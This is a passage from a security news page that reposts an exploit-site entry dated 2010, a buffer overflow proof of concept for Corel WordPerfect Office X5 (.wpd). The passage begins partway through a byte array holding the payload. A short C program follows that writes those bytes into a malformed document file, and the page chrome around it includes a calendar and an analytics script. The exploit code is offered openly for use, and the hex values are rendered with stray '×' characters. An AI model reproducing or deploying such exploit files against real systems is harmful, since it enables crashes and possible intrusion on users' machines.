0×00, 0×83, 0×01, 0×04, 0×00, 0×03, 0×00, 0xFC, 0×9C, 0×21, 0×10, 0×00, 0xDD, 0xD4, 0×1C, 0×12,
0×00, 0×00, 0×02, 0×00, 0×55, 0×53, 0×55, 0×53, 0×2E, 0×00, 0×2C, 0×00, 0×12, 0×00, 0xD4, 0xDD,
0×0B, 0×0B, 0×00, 0×03, 0×00, 0×00, 0×04, 0×0B, 0×00, 0xDD, 0xD4, 0×5F, 0×10, 0×00, 0×00, 0×06,
0×00, 0×03, 0×00, 0×00, 0×00, 0×00, 0×01, 0×10, 0×00, 0xD4, 0×5A, 0×65, 0×72, 0×6F, 0×80, 0×53,
0×63, 0×69, 0×65, 0×6E, 0×63, 0×65, 0×80, 0xD4, 0×5F, 0×10, 0×00, 0×00, 0×06, 0×00, 0×02, 0×00,
0×00, 0×00, 0×00, 0×01, 0×10, 0×00, 0xD4, 0×4C, 0×61, 0×62, 0xD4, 0×5F, 0×10, 0×00, 0×00, 0×06,
0×00, 0×03, 0×00, 0×00, 0×00, 0×00, 0×01, 0×10, 0×00, 0xD4 //2810 bytes

};

int main(int argc, char *argv[])
{
corel = fopen(OCCUPANT, "wb");

if(corel==NULL)
{
perror("nWoow Camel! Can’t open file…n");
}

fwrite(payload,1,sizeof(payload),corel);
fclose(corel);
sleep(1);

printf("nIt is done!n");

return 0;
}

# <a href=’http://inj3ct0r.com/’>Inj3ct0r.com</a> [2010-07-12]</pre><script type=’text/javascript’>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src=’" + gaJsHost + "google-analytics.com/ga.js’ type=’text/javascript’%3E%3C/script%3E"));</script><script type=’text/javascript’>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
Source: http://inj3ct0r.com/exploits/13315

Quote

We use Linux for all our mission-critical applications. Having the source code means that we are not held hostage by anyone's support department.

Categories
- Exploits
- News

Information Security News and Exploits

Providing you with Security News and Exploits from all over the web.

Corel WordPerfect Office X5 15.0.0.357 (wpd) Buffer Overflow PoC

Leave a Reply

Quote

Categories

Calendar

Recent Posts

M	T	W	T	F	S	S
« Jun				Aug »
			1	2	3	4
5	6	7	8	9	10	11
12	13	14	15	16	17	18
19	20	21	22	23	24	25
26	27	28	29	30	31